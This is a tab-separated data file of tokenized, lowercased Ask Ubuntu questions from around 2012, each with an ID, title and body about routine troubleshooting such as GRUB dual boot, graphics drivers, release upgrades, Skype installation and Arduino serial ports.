182231	i dont know how to run e2fsck or fsck and what are their differences	my kern.log file advise me to run e2fsck . aug 30 14:10:11 ubuntu kernel : [ 122.378292 ] ext4-fs ( sda11 ) : warning : maximal mount count reached , running e2fsck is recommended aug 30 14:10:11 ubuntu kernel : [ 122.387488 ] ext4-fs ( sda11 ) : mounted filesystem with ordered data mode . opts : ( null ) /dev/sda11 is not mounted within my current os ( ubuntu 10.04 ) i have known that e2fsck is a dangerous command when running against the root partition which is at the same hard disk as sda11 . i would trust in this solution better than others : can i run fsck or e2fsck when linux file system is mounted ?
182238	sudo and sound , how to make them work together	basically inside a sudo session , even one emulating another none root user ( sudo -u username command ) there is no sound available . inside a sudo session sound appears disabled . i need sound , how do i fix it ?
182239	ubuntu lenove ocz agility3 - no grub after install	i 've tried a dualboot ( win7 + ubuntu ) installation it on a lenovo e330 with agility3 240 gigs ... conclusions : ubuntu : : ubuntu 12.04 x86_64 ( 21.06.2012 ) is not able to install grub in a bootable way . grub will be installed and does update-grub during installation , recognizes also the win os . but after a restart it boots directly to windows.this is directly connected to the ocz agility3 . on a good old fashion harddisk ( those with the moving parts ) ubuntu is capable to install grub with no problem in a bootable manner . pinguyos : : pinguyos 12.04 lts x86_64 ( which is a ubuntu based distro ) is able to handle the grub installation on ocz agility3 . however they both use grub 1.99 ... what i did : : installed windows . installed ubuntu . installed pinguyos . grub updates : : grub updates are only through pinguy os possible , this means you have to edit the ubuntu grub entries manually after kernelupdates on ubuntu , in the piguyos sytem.. what i 've already tried : firmwareupgrade ocz ( livestick , successfull ) install ubuntu grub to sda install ubuntu grub to sdc ( ubuntu partion ) install ubuntu grub to /boot update-grub manually after install restore grub any ideas appreciated..
182242	validity fingerprint sensor not detected	i have a vfs471 validity fingerprint driver that is not detected in my hp probook 4530s . can someone help ?
182245	lucid 10.04 lts = > precise 12.04.1 : upgrade does n't work	i googled and looked into all known issues on ubuntu forums related to distribution upgrade but i ca n't figure out why a 10.04 lts server wo n't detect the last lts 12.04.1 . i guess since 12.04 is a fresh dist , not much is reported for related issues here is what i did : apt-get update apt-get upgrade apt-get install update-manager-core it was already installed so no update for this package . i checked : /etc/update-manager/release-upgrades [ default ] # default prompting behavior , valid options : # # never - never check for a new release . # normal - check to see if a new release is available . if more than one new # release is found , the release upgrader will attempt to upgrade to # the release that immediately succeeds the currently-running # release . # lts - check to see if a new lts release is available . the upgrader # will attempt to upgrade to the first lts release available after # the currently-running one . note that this option should not be # used if the currently-running release is not itself an lts # release , since in that case the upgrader wo n't be able to # determine if a newer release is available . prompt=lts i also checked my sourcelist before running apt-get : /etc/apt/sources.list deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-security main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse # deb http : //landscape.canonical.com/packages/hardy ./ # deb-src http : //landscape.canonical.com/packages/hardy ./ and then following ubuntu guide for precise upgrade the command below should work : root @ xxxxxxxxx : /etc/apt # do-release-upgrade -d checking for a new ubuntu release no new release found i tried without dev release option -d but got the same result kernel : root @ xxxxxxxxx : /etc/apt # uname -a linux xxxxxxxxx 2.6.32-42-generic # 95-ubuntu smp wed jul 25 15:57:54 utc 2012 i686 gnu/linux linux distrib : root @ xxxxxxxxx : /etc # cat lsb-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.4 lts '' source list : root @ xxxxxxxxx : /etc/apt # cat sources.list deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-security main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse so am i missing something ? the server was accessing outside through a proxy but i grant direct access to this server to avoid any internet access problem or redirection but no clue ... any help would be appreciated
182248	why is grub menu not shown when starting my computer ?	i am a new user of ubuntu 12.04 . i am installing the windows xp and ubuntu using both operating systems . from the start my desktop does not show the grub menu . please guide me with step by step instructions . thanking you .
182249	what keeps creating the ~/snapshots directory ?	this question is similar to ubuntu keeps creating dummy directories , except it 's about the ~/snapshots directory . i do n't have that startup application , and i 've moved all of ubuntu 's directories away from there - the only one i ca n't find is the snapshots . it 's always empty , and seems quite useless . the only startup applications i have are google chrome and the gnome gmail open office configurator .
182250	no brightness control on asus 75 laptop	how can i get the brightness on my asus g75 laptop to work in ubuntu 12.10 alpha ? on my macbook pro , there used to be an nvidia-bl-dkms module . on my dell xps 15z , it worked out of the box . now i am a little bit stumped and need help . i 've got the nvidia-current 304.43 drivers installed . thanks .
182254	how can i fix stability problems with unity 3d on 12.04 with nvidia drivers ?	ever since i upgraded from 11.10 to 12.04 i 've been having display problems . basic symptom is that the display buffer appears corrupted . it seems to affect the alt-tab display most often - instead of seeing little pictures of the windows the boxes for the windows have garbage in them , random text and messed up images . after that it spreads to the status bar at the top of the screen and then into windows themselves - for example , emacs will have garbage text across the top of the window and inside the buffer area . sometimes switching to a vt and back to x will clear it , sometimes not . eventually the system will lock up and i 'll have to restart . so far the only fix i 've found is running unity 2d , but frankly that 's not great at all . it definitely feels like a second-class environment . i 've tried upgrading my nvidia drivers twice - first to 304.37 then to 304.43 yesterday , both times using nvidia 's installer . before that i was running 295.59 . i 'm fully updated running the 3.2.0-29-generic kernel . this machine is a thinkpad t510 with a dedicated gpu - the nvs 3100m , aka the gt218 . i do n't see anything useful in my x logs or in syslog , but let me know if you want to see them anyway . thanks for the help !
182255	video freez problem while installing ubuntu 11.10 on intel z77 chipset	brand new pc with intel z77 chipset , i am trying to install ubuntu 11.10 ( 64bit ) on it . after boot up from cd i am able to see first screen with keyboard then video freezes some random screen is appeared which is not related to installation steps . obviously my expected screen is `` try ubuntu/install '' but not happening . my question is ubuntu 11.10 supports intel z77 chipset or not ? what 's the solution for this problem ? regards , rk
182264	why ca n't i connect to an ad-hoc wireless network on a windows 7 system ?	i am using hp compaq 6735b with 12.04 on it . i am trying to connect to an ad hoc network set up on a windows 7 system . however , my ubuntu is giving me lots of problem . it does n't always show the wireless networks and if it decides to show me the networks , i ca n't connect to the ad hoc network . please help someone .
182266	how can i activate `` save changes '' dialogs with my keyboard ?	this is what i 'm talking about : what i 'm used to : n = no , do n't save changes y = yes , save changes c = cancel this was pretty universal in all windows dialogs , but rarely ( if ever ? ) does it work in ubuntu .
182272	how to use mobile wi-fi to connect internet ?	i am using a samsung mobile , which is having wi-fi feature . now i am here to request that is there any way i can use the mobile wi-fi modem to connect the internet through the pc ? i mean , that wifi modem will list in my pc available network connections ? as suggested i am giving the image of my phone and its specification link . click here for phone information .
182274	how to disable autologin in lubuntu ?	i like to switch sometimes between lubuntu and ubuntu 2d on my laptop . but i especially like to choose which one i will use in the session i am about to start . but the only way of choosing is start the laptop up , and the last used thing will show up ( as it should ) , then log out completely , and choose the other thing from the login menu . i have spent a lot of my lifetime using windows , and always i was asked a login before i actually could do anything . now i think it is weird that anyone can log into a password-protected account without giving any passwords , as long as the last user was the admin . also : will logging out before shutdown help ? here is my default.conf file .
182275	when should you push variables in quotes in boolean conditions ?	are the following two boolean expressions the same ? if [ -n $ 1 ] ; then if [ -n `` $ 1 '' ] ; then if not - when should you put a variable in quotes ?
182286	how to make the cursor in the terminal to stop blinking after it loses focus ?	i noticed strange behavior in gnome-terminal : when the terminal has focus , the cursor is blinking . after it loses focus , the cursor keeps blinking for about 10 seconds , then stops . i 'd like the cursor to stop blinking immediately after the focus is lost ( and to start blinking immediately after the focus is gained ) . is there a way to do that ? i 'm on 12.04 with unity-2d and have the focus follows mouse policy enabled .
182288	ubuntu 12.04 freezes w/ ethernet unplugged + wireless drops ( acer aspire 5516 )	ubuntu 12.04-12.10 32/64 freezes or wo n't boot if the ethernet cable is unplugged and will not hold a wireless connection . here is my scenario ... laptop : acer aspire 5516 wireless card : broadcom bcm4312 ubuntu 12.04 32/64 issues unity 3d wo n't load without the ethernet cable plugged in . if i let it load with ethernet plugged in , it will freeze once i disconnect the cable . unity 2d will load without the ethernet cable plugged . in unity 2d , wireless can not hold a connection . i can connect to a wireless network , but when i try to use it ( i.e . open a browser ) , it disconnects . i can reconnect by disabling wireless ( uncheck enable wireless ) , re-enable wireless , and reconnect . but , it will disconnect again once i start using it . ubuntu 12.10 issues since 12.10 only gives me the option to load 3d ( i assume ) , i experience the same thing as the first issue in 12.04 . attempted solutions enable networking/lan in bios set lan first in boot priority in bios remove sta wireless driver ( bcmwl-kernel-source ) and install b43 low power driver ( firmware-b43-lpphy-installer ) . remove default network manager and install wicd . so far , i have had no luck with fixing this issue . does anyone have any further suggestions ?
182292	shift switcher change on release	i want to make shift switcher to select window on release , like alt+tab . i currently have super+tab configure for next window in workspace , so i press it and move windows , but when i release , i have to press enter or shift to get to the window . this isnt the normal behaviour with the default key for previous window , shift+super+tab , which changes to the selected window on release . how can achieve this , or is it a bug ? thanks a lot .
182300	only see wallpaper when resuming from lock and closed lid	running ubuntu 12.04 unity with kernel 3.4.0-030400-generic on a laptop , when i lock with ctrl + alt + l and close the lid , then open the lid , i expect to see a prompt asking for password , but instead all that is visible is the current desktop background , and mouse cursor . this happens immediately after lid is closed and opened . suspend on lid close is off . when moving mouse around the middle of the screen , it changes shape as if there was a textbox under it ( the password prompt ) , implying there is something there , just not rendered . i can ctrl + alt + f1 to tty and restart the laptop , but , shockingly , it is annoying . i have have also had some random freezing problems , but those seemed to end when i updated from kernel 3.2 to 3.4 . laptop is asus a75vm-ty167v , has nvidia geforce 630m and radeon hd4000 . i am using bumblebee . googling only brings up issues with freezing , suspending , and black screens , so this seems a fairly rare problem . any ideas ? edit : appears to be a known bug and closely related to black screens . https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/966744 i guess this can be closed .
182301	ubuntu no longer asks if i want to delete .trash-1000 upon removal of removal media	upon removing any removable media , ubuntu does n't ask if i want to remove the trash folder to free up space . it used to show a dialogue which prompted me to delete the folder . how can i get this functionality back ?
182304	c # mono.cairo example to make an eventbox transparent	i need to create an image with transparency placed on top of another image , inside a regular gtk # window . the first image should be able to respond to mouse clicks . the simple way would usually be to put an image inside an eventbox - and inside the window . however , eventbox is not transparent by default , so even if the png image itself has transparent areas , when inside the eventbox it shows as a square opaque background around the image . i 'm aware that eventbox can be made transparent using cairo , but so far was not able to do that . can anyone provide a short c # example to make eventbox transparent ? thanks !
182306	failed to download repository information ( related topics did not seem to answer my question )	w : failed to fetch http : //archive.ubuntu.com/dists/pangolin/main/binary-i386/packages 404 not found [ ip : 91.189.92.190 80 ] , w : failed to fetch http : //archive.ubuntu.com/dists/pangolin/universe/binary-i386/packages 404 not found [ ip : 91.189.92.190 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . i am running 12.04 x86 , but when i check the sources.list file , there is nothing in there that seems to reference anything i386 ( but the error spits out 'i386 ' as part of the repo url ) . i think it has to do with my above setup , because i am choosing to run the latest software ? i 'm just not sure where to look to resolve this . sources.list is n't helping : (
182307	is any one using aptana studio with ubuntu 12.04 ?	is any one using aptana studio as a stand alone in ubuntu 12.04 ? i have downloaded the file , and have the latest oracle sun java installed . but when i double click the aptanastudio3 icon it tels me to search for a program to open it ... any special way i need to go about things ?
182310	system requirements for ubuntu 12.04 ( will it run on 512mb ram ? )	i have a fujitsu siemens amilo d 1840 laptop and i was wondering will ubuntu 12.04 run normally , once installed with wubi . i have an intel pentium 4 3.02 ghz processor and 512 mb ram , as mentioned in the title . p.s . excuse me if my english is bad , but i 'm from bulgaria
182313	install uwsgi 1.2.5 via pip	welcome , currently i 'm trying to install latest uwsgi on my vps ( ubuntu 11.10 ) based on instruction from the site http : //projects.unbit.it/uwsgi/wiki/quickstart pip install uwsgi during compilation i see some errors : ... [ gcc -pthread ] spooler.o *** uwsgi compiling embedded plugins *** [ gcc -pthread ] plugins/python/python_plugin.o complete output from command /usr/bin/python -c `` import setuptools ; __file__='/etc/apt/sources.list.d/build/uwsgi/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- single-version-externally-managed -- record /tmp/pip-joud1i-record/install-record.txt : running install in file included from plugins/python/python_plugin.c:1:0 : plugins/python/uwsgi_python.h:2:20 : fatal error : python.h : no such file or directory compilation terminated . using profile : buildconf/default.ini detected include path : [ '/usr/lib/gcc/i686-linux-gnu/4.6.1/include ' , '/usr/local/include ' , '/usr/lib/gcc/i686-linux-gnu/4.6.1/include-fixed ' , '/usr/include/i386-linux-gnu ' , '/usr/include ' ] patching `` bin_name '' to properly install_scripts dir ... and finally i see : ... [ gcc -pthread ] spooler.o *** uwsgi compiling embedded plugins *** [ gcc -pthread ] plugins/python/python_plugin.o -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command /usr/bin/python -c `` import setuptools ; __file__='/etc/apt/sources.list.d/build/uwsgi/setup.py ' ; exec ( compile ( open ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- single-version-externally-managed -- record /tmp/pip-joud1i-record/install-record.txt failed with error code 1 in /etc/apt/sources.list.d/build/uwsgi storing complete log in /root/.pip/pip.log has anyone any suggestions how can i install latest uwsgi ? regards , grzegorz
182331	trying live-usb 12.04.1 image on an old desktop	i am trying to load ubuntu 12.04.1 32-bit desktop image on an old desktop computer . the system shows the initial menu , but after a while , i get an error like the one in the following two screenshots ( it takes a few seconds to go from one to the other in the screen ) : i tried to load it using the different usb ports at the back of the computer , just in case , and i get basically the same error . find another screenshot from another try : any ideas what might be happening ? notes : i checked the md5sum of the iso file to be e235b63c02644e219b7bf3668f479c9e *ubuntu-12.04.1-desktop-i386.iso . i did the 'test ' on the laptop where i created the usb drive , and it loads up correctly . the desktop computer in question is an old amd duron 1800mhz with 512mb ram . i ran a memtest on the computer , and all went fine .
182345	upgrade graphics card	i have a pentium dual core es 8000 at 3.20 ghz my graphics card is a nvidia gf or geforce gt 430 with 1 gb of ram what would be the best graphic card to get for my pc so i can run games such as dayz arma 2 on ubuntu ? or the most compatible one with ubuntu â for drivers and easy installation . i have installed steam and there are some graphic issues with it . so i would like to install a graphics card that will work with steam and ubuntu .
182351	error after installing ubuntu 12.04 using wubi	after using windows ubuntu installer from within windows , i am prompted to restart , so i follow the directions . when i try to start ubuntu after restarting , the desktop background appears , but then a loading bar with this title appears . verifying the installation configuration ... while this is loading , an error window pops up that says no root file system is defined please correct this from the partitioning menu there is only an 'ok ' button available to click , and if i click that the same error window appears . i do not know how to get to the `` partitioning menu '' from this state , so the only option i have is to shut down my computer . what can i do so that ubuntu finds a `` root file system '' ? can i diagnose this problem via windows ? does anyone have any insight ? fyi - i am using a new ultrabook with 6gb ram , intel i7 3rd gen processor , and no cd/dvd drive .
182353	use mongodb and pymongo inside an pygtk app	i am abort to make an python app with quickly . the app need to store some data in an database , to this i am planing to use mongodb . so my question is like this : how can i make the py-app to auto install mongodb and pymongo , if the user donâ´t have this installed ?
182354	after installing 12.04 , wifi ask me for a pass every 2 seconds	i installed 12.04 and when i boot my computer , i connect to my wifi and i put my password , all was good but in 2 seconds , it prompts me to enter a password . internet works but for only 2 seconds , and not more . please help .
182358	ca n't install skype on 12.04 64-bit	i 've tried many different ways : i downloaded the file from the skype website , which returned this error can not install ia-32-libs . i followed these instructions and here is what i got : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/packages/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/packages/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . i even tried this command line : sudo apt-get install lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 skype and this is what i got : error : need a repository as argument pandora @ ubuntu : ~ $ sudo apt-get install lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch skype : depends : skype-bin e : unable to correct problems , you have held broken packages . i just do n't know what to do anymore , if i ca n't use skype , i might as well not use ubuntu at all . please , someone help .
182359	how can i set hotkeys ?	how can i set the hotkey ctrl+shift+esc like it is in windows , to the system moniter , or any other programs for that matter
182360	trash directory totally missing	i am using ubuntu 12.04 with unity . i just found that there is no trash directory at : ~/.local/share/trash like explained here . where is the trash dir ?
182361	ca n't open minecraft with java	i know this has been asked here before , but none of the solutions have worked for me . i have a fresh install of ubuntu 12.04 on my system and i installed open java 7 and i downloaded minecraft . i right clicked minecraft went to properties and set it as an executable and then went to open with and java is no where to be found in the list . i made a new java desktop file in /usr/share/applications and now when i go to the list java is there and i set minecraft to open with it by default but when i open it nothing at all happens . now how am i supposed to get minecraft to work ?
182363	arduino uno not recognized , /dev/ttyacm0 does n't exist	i recently purchased an arduino uno from sparkfun , and attempted it with a fresh ubuntu 12.04 build . i installed the ide , and it seemed to work fine ; i could write the sketches . however , when i plugged the arduino in , it appeared not to recognise it . i should also note that the arduino does draw power from the usb port , as the green `` on '' light is illuminated . the serial port arduino uno should be `` assigned to '' is /dev/ttyacm0 . however , this did not exist , as upon running ls dev/tty* , i got the following results : /dev/tty /dev/tty23 /dev/tty39 /dev/tty54 /dev/ttys10 /dev/ttys26 /dev/tty0 /dev/tty24 /dev/tty4 /dev/tty55 /dev/ttys11 /dev/ttys27 /dev/tty1 /dev/tty25 /dev/tty40 /dev/tty56 /dev/ttys12 /dev/ttys28 /dev/tty10 /dev/tty26 /dev/tty41 /dev/tty57 /dev/ttys13 /dev/ttys29 /dev/tty11 /dev/tty27 /dev/tty42 /dev/tty58 /dev/ttys14 /dev/ttys3 /dev/tty12 /dev/tty28 /dev/tty43 /dev/tty59 /dev/ttys15 /dev/ttys30 /dev/tty13 /dev/tty29 /dev/tty44 /dev/tty6 /dev/ttys16 /dev/ttys31 /dev/tty14 /dev/tty3 /dev/tty45 /dev/tty60 /dev/ttys17 /dev/ttys4 /dev/tty15 /dev/tty30 /dev/tty46 /dev/tty61 /dev/ttys18 /dev/ttys5 /dev/tty16 /dev/tty31 /dev/tty47 /dev/tty62 /dev/ttys19 /dev/ttys6 /dev/tty17 /dev/tty32 /dev/tty48 /dev/tty63 /dev/ttys2 /dev/ttys7 /dev/tty18 /dev/tty33 /dev/tty49 /dev/tty7 /dev/ttys20 /dev/ttys8 /dev/tty19 /dev/tty34 /dev/tty5 /dev/tty8 /dev/ttys21 /dev/ttys9 /dev/tty2 /dev/tty35 /dev/tty50 /dev/tty9 /dev/ttys22 /dev/tty20 /dev/tty36 /dev/tty51 /dev/ttyprintk /dev/ttys23 /dev/tty21 /dev/tty37 /dev/tty52 /dev/ttys0 /dev/ttys24 /dev/tty22 /dev/tty38 /dev/tty53 /dev/ttys1 /dev/ttys25 any help would be greatly appreciated .
182365	irq conflicts causing video card and boot problems ?	tl ; dr - i have 4 devices sharing 1 irq . is this bad and how do i tell the bios to stop it ? background : i have an old dell gx280 dual pentium 4 that i ( semi ) resurrected last weekend with an installation of ubuntu 12.04 . everything was going fine the first several hours until a problem that plagued me when winxp was on that machine happened -- it froze . completely froze . none of the myriad of ways i have found here on askubuntu helped me to regain control except a long-press of the power button to shut it off . clearly , this was n't a software/winxp issue . after much googling , i found that hardware conflicts can often cause this sort of total lock-up and with all the odd blocks of yellow and flecks of color showing on my screen ( both winxp and ubuntu ) i figured my old geforce 7600 was failing and causing me these odd issues . ( a good canned-air dusting of the entire interior fixed the color fleck problem ) again , through much googling and numerous answers found on askubuntu , i somehow stumbled my way onto the lshw command . after going through it , line by line , i found that i have four devices sharing irq 16 : eth0 , wlan0 , ide0 ( dvd-rw ) , and my video card . in hindsight , i can recall weird instances of my ethernet connection to another computer not working when i thought it should . i never full troubleshot those issues so it could be a coincidence . the other thing that has been plaguing me since installing ubuntu ( was n't there during winxp ) has been periodic moments of my monitor getting no signal from ubuntu during boot . the first couple days , it would disappear after the dell boot screen and reappear at ubuntu login . now , it disappears after the dell boot screen and does n't return at all -- i have to hit f12 where i can load a safe mode version of ubuntu and get more details like dmesg and lsdev . i also ran memtest86 overnight and woke up to zero errors , so failing ram is out . where do i go from here ? update , 3 sept so , the below measures did not work . the machine still froze up some time saturday morning , so i completely excised the video card from the system and plugged the monitor into the good old onboard vga port . it 's been 2 and a half days with no freezes . no big deal , not having the 3d card , i suppose . i was n't planning on gaming with ubuntu , anyway . thanks for all the help and my apologies for posting on the wrong board . also , i 'm not sure how to `` reclaim '' my original questioned account , so i ca n't mark the question as resolved . thank you , imaginaryrobots and steve kroon . i went back to the bios screen and expanded every single menu , but could find nowhere to edit irq settings . irq was mentioned only twice as info about a particular device ( i do n't remember which ) but was not a writable piece of information . while i was in the bios settings , i did tell it to use the onboard video controller ( ? ) instead of the one on my geforce card . i expected to have to plug the monitor into the vga port , instead of the dvi one on the video card ( w/adapter ) , but the machine booted normally without a plug change , which i still find odd . as of this morning , it has been about 10 hours with no freeze-up . i will wait out the weekend to see if it behaves itself and come back later to report . thank you for the link , steve . the panic surrounding my shared irqs has been dispelled and my focus is back on the video card .
182377	ati radeon 4200 has graphics and performance issue ; how to rectify ?	i have a ati radeon 4200 graphics card . when ever i launch runescape the graphics tear and get shifted all over the place . is there anything i can do to fix this ? i 'm using ubuntu 12.04 .
182382	how do i refresh software sources after adding a ppa	i 'm looking to learn a new way to update sources without having to revert to the terminal or the software updater . when i 'm trying to explain how to add a ppa to new users it sounds really silly having to do that . the ubuntu software center does auto update , but a few minutes `` after '' adding the ppa . is there a way to click a button to refresh that instant ?
182383	do n't have sound in 12.04	i do n't have sound even though i have got the latest updates , installed the driver for the graphics card , installed alsa mixer which there was some mute but did n't do anything . what is wrong ?
182400	how to prevent suspension when a program is currently running ?	is there any way to make ubuntu 12.04 understand when it should suspend or not in terms of the software that is currently running ? for example , if i am installing something and it takes more than 10 minutes , which is the time limit for my pc to suspend , then i do not want my system to system to suspend till the installation of the program is finished . if my system is inactive i want it to suspend , but on the other hand if something is running i do not want to suspend .
182401	easytether .deb wo n't install due to errors	i am running ubuntu 12.4 64amd . i cant get easy tether to install regardless of which version i use ( 32 or 64bit ) but i keep getting an error when i try to run it in the command line . it tells me it not a valid deb file . if i click it on the desktop the install manager comes up but the install button is not highlighted for me to click to install it that way . when i run sudo dpkg -i easytether_0.7.3-1_i386.deb on the package the output is : dpkg-deb : error : `easytether_0.7.3-1_i386.deb ' is not a debian format archive dpkg : error processing easytether_0.7.3-1_i386.deb ( -- install ) : subprocess dpkg-deb -- control returned error exit status 2 errors were encountered while processing : easytether_0.7.3-1_i386.deb please help . i 'll be using my phone as internet modem .
182410	delete corrupted folder	i am trying to delete a folder in my home directory ; its name is completely garbled . in nautilus , the garbled text is followed by 'invalid directory . ' deleting it with nautilus stalls ; i ca n't type in the garbled name in the terminal . peter @ io_vbox : ~ $ ls -lbdr * ... drwxrwxr-x 3 peter peter 4096 jul 28 15:19 \346 > \3152\357+\332 ) \363*\356 , \253-\277+h & \266\033z\v\373\366\340\340 ? \314\022\274p\262\003\260éľż\303p\326\342\351\214\374f\016x\036r ) ! .\026 ... any ideas ? running 12.04 ; if it 's of any importance , this is running in virtualbox on a macbook air . it was installed through virtualbox . i do n't have any other signs of ssd failure that i 've picked up on -- referring to this question : random files ( invalid encoding ) appearing in home directory thanks
182414	email-client such as evolution with sent-emails -folder ?	i zwitched on desktop from mutt to evolution to some extent . now i can not find my sent emails so where are the sent -emails when they are sent with evolution -email-program ?
182416	how do i uninstall dropbox ?	after booting up , a popup screen tells me dropbox did not install correctly , but it is lurking somewhere . to install properly i first have to delete the incorrect install . how can i do that ? i 'm using the latest version of ubuntu .
182418	how to get /usr/bin/env ruby to point to the correct ruby environment ?	so i was making a cgi ruby script and had the following at the top of the script file : # ! /usr/bin/env ruby require 'rubygems' require 'action_pack' require 'cgi' after a couple of hours of not getting `` /usr/bin/env : ruby : no such file or directory '' error and google searching , i uninstalled my system ruby 1.8.7 ( i also had 1.9.3 installed via rvm ) by doing sudo apt-get purge ruby rubygems . i still get the error . when i type `` which ruby '' , i get /home/homeuser/.rvm/rubies/ruby-1.9.3-p194/bin/ruby . does anyone have any insight as to how to fix this problem ? here is what echo $ path yields : /home/homeuser/.rvm/gems/ruby-1.9.3-p194 @ rsoc326/bin : /home/homeuser/.rvm/gems/ruby-1.9.3-p194 @ global/bin : /home/homeuser/.rvm/rubies/ruby-1.9.3-p194/bin : /home/homeuser/.rvm/bin : /var/lib/gems/1.8/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/homeuser/.rvm/bin i have this same setup on my desktop and i do n't have the same issue .
182421	kodak esp aio prints good on ubuntu 12.04 , butnothing finds the scanner . any ideas , please ?	my kodak esp 3250 prints great on ubuntu 12.04 , but nothing finds the scanner . tried xsane and libre writer to no avail . need all the help i can get . only other printers i have to use are , ugh , lexmarks . thank you
182422	are my other partitions safe from harm from an alpha/beta release ?	i am quite intrested in testing the latest alpha-3 of ubuntu , however , performance in virtualbox is slow and somewhat buggy ( i know ! it 's an alpha ) - guest additions wer n't installing , bad mouse intergration , etc . i would now like to test this release on my hard drive . but my main system ( 12.04 ) is also on this very same hard drive . is this safe ? can the alpha touch my main partition ? are there any other risks ?
182423	ubuntu sound volume is 40 % lower than in windows	i have 2x 2.1 speakers connected to the computer where i have ubuntu 12.04 installed . on the software side i 've set all the volume controls to 100 % with the alsamixer program . the speakers have their own volume control , maintaining those at the same level , and switching between ubuntu and windows ( xp and 7 ) , on windows the output volume is at least 40 % higher , even when having the windows volume control at 50 % ( without touching the speakers volume control ) it 's still much higher than the sound on ubuntu . why can this be happening ? are there some alternative sound drivers ( other than the default ones ) i could test to see if it makes a difference ? some info about the card : root : $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xfbff4000 irq 55 1 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfbcfc000 irq 56 root : $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 02:00.1 audio device : advanced micro devices [ amd ] nee ati cayman/antilles hdmi audio [ radeon hd 6900 series ] i think the one i am using is the intel one , the other seems to be from the vga card which is an ati radeon 6950 . running gstreamer-properties and switching between alsa , oss , ossv4 and pulseaudio does n't seem to make any difference .
182424	how to make zeitgeist just log my application not my files	i 'm using ubuntu 12.04 with unity . i want to config the zeitgeist to just track my application but ignore the usage of files . i tried to add `` / '' to the blacklist , but it did n't work . the recent files still appear in dash . thanks !
182427	fresh install on ssd with ubuntu and windows vista , using whole disk encryption for ubuntu	i would like to do a fresh install on a ocz vertex plus r2 ssd 60gb drive i purchased on the cheap . since the aes-encryption looks like it may not work optimally for this drive , i would like to set up a dual-boot to windows vista ( the only windows copy i have for clean install purposes ) and ubuntu 12.04 with the best encryption scheme possible . my plan is to have windows around just in case i need to use a program that wo n't work with wine and ubuntu as my daily os with all of my information secured in case the laptop is ever stolen or sold . although this setup will not provide a lot of space , i think i can squeeze both oses and have enough for second-computer office tasks . so , my questions are : which os should i install first , ubuntu or vista ? any special considerations when partitioning the drive ? how should i install ubuntu to ensure full disk encryption for the linux partition ( s ) and or my daily computing ? is there a significant performance upgrade with doing a solo install of ubuntu instead of a dual boot setup ? will trim , for example , work correctly ? are there any significant security concerns with going the route of a dual-boot , other than the fact that any activity on windows may be fully recoverable if the drive is stolen or sold ? thanks in advance !
182433	hfs+ hard drive being mounted as read only	this is a recurring problem and occurs a few times a week . i have an external hard drive which is hfs+ . every couple of weeks , for no obviuous reason , when i mount it by pluggin it in to my ubuntu 11.10 , it is read only and i ca n't copy any files into it . i gksudo nautlius and change the ownership and it magically works in some time . but returns to the read only state soon in a few hours-days without any rhyme or reason . right now my fstab does n't have any entry for my hard drive . what gives ? what in the world is going on with linux/hfs+ ? this is frustrating . i ca n't reformat my hard drive because i have almost a terrabyte of data in it and no receptacle to hold it while i reformat it .
182435	brightness problem with xubuntu	i use xubuntu linux brightness is good without using suspend mode but after using suspend mode i got problem with brightness it 's lower than before ! i need your help
182439	what is macromedia flash alternative in ubuntu	what is macromedia flash alternative in ubuntu ?
182440	how to make gmail open when clicking mailto : links in the same browser it is clicked ?	i just installed 12.04 and when clicking mailto : links thunderbird opens . i want gmail to open in the browser that the mailto : link is clicked . so if i am in firefox and click a mailto : link a new ff tab opens with gmailloaded . and if i am in chrome and click a mailto : link then a new chrome tab opens up with gmail loaded . is there a way to do this via some script ? or would i need to set this in some system settings ?
